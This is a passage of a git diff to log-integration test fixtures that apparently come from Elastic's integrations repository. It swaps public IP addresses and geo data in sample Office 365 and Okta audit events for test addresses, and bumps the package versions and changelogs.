"OneDrive", "kind": "event", @@ -695,25 +641,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -755,7 +683,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -767,12 +695,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:55.229370700Z", - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eLimited Access\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"88a041e3-2f3a-483c-cf76-08d7b17b4e5b\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"Limited Access System Group\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:49.545772500Z", + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eLimited Access\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"88a041e3-2f3a-483c-cf76-08d7b17b4e5b\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"Limited Access System Group\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", "kind": "event", @@ -808,25 +736,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -868,7 +778,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -880,12 +790,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:55.229372400Z", - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eSystem.LimitedEdit\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"98633e47-3540-4e8a-bcfc-08d7b17b4e48\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:49.545780600Z", + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eSystem.LimitedEdit\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"98633e47-3540-4e8a-bcfc-08d7b17b4e48\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json index ab3dda7557f..281ed78eec5 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json @@ -2,12 +2,12 @@ "events": [ { "event": { - "original": "{\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36787265537,\"ClientIP\":\"79.159.10.151:12345\",\"CreationTime\":\"2020-02-28T09:42:45\",\"GroupName\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"ObjectId\":\"Sales\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d6edf94\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}" + "original": "{\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36787265537,\"ClientIP\":\"67.43.156.13:12345\",\"CreationTime\":\"2020-02-28T09:42:45\",\"GroupName\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"ObjectId\":\"Sales\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d6edf94\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}" }, "o365audit": { "ActorUserId": "alice@testsiem2.onmicrosoft.com", "ActorYammerUserId": 36787265537, - "ClientIP": "79.159.10.151:12345", + "ClientIP": "67.43.156.13:12345", "CreationTime": "2020-02-28T09:42:45", "GroupName": "Sales", "Id": "2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json index 5862a53c661..29a6e5ba1cb 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json @@ -2,26 +2,8 @@ "expected": [ { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, "port": 12345, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -52,7 +34,7 @@ "alice" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -64,12 +46,12 @@ }, "client": { "port": 12345, - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:55.657124800Z", - "original": "{\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36787265537,\"ClientIP\":\"79.159.10.151:12345\",\"CreationTime\":\"2020-02-28T09:42:45\",\"GroupName\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"ObjectId\":\"Sales\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d6edf94\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}", + "ingested": "2021-12-09T13:42:51.551520Z", + "original": "{\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36787265537,\"ClientIP\":\"67.43.156.13:12345\",\"CreationTime\":\"2020-02-28T09:42:45\",\"GroupName\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"ObjectId\":\"Sales\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d6edf94\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}", "code": "Yammer", "provider": "Yammer", "kind": "event", @@ -146,7 +128,7 @@ "ip": "fdfd::555" }, "event": { - "ingested": "2021-06-17T07:32:55.657132800Z", + "ingested": "2021-12-09T13:42:51.551529300Z", "original": "{\"ActorUserId\":\"asr@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36085768193,\"ClientIP\":\"[fdfd::555]:12346\",\"CreationTime\":\"2020-02-28T09:39:20\",\"GroupName\":\"Company group\",\"Id\":\"3f3e7f1c-84c1-55fc-9bb2-c8b8563eae06\",\"ObjectId\":\"Company group\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"asr@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d292e16\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}", "code": "Yammer", "provider": "Yammer", diff --git a/packages/o365/manifest.yml b/packages/o365/manifest.yml index 3274aaf2074..ee5f19a1765 100644 --- a/packages/o365/manifest.yml +++ b/packages/o365/manifest.yml @@ -1,6 +1,6 @@ name: o365 title: Office 365 Logs -version: 1.3.0 +version: 1.3.1 release: ga description: Collect and parse event logs from Office 365 with Elastic Agent. type: integration diff --git a/packages/okta/changelog.yml b/packages/okta/changelog.yml index 978525b626f..4f334f788e1 100644 --- a/packages/okta/changelog.yml +++ b/packages/okta/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json index dbec3980282..1f468176c08 100644 --- a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json +++ b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json @@ -1,13 +1,13 @@ { "events": [ { - "message": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}" + "message": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}" }, { - "message": 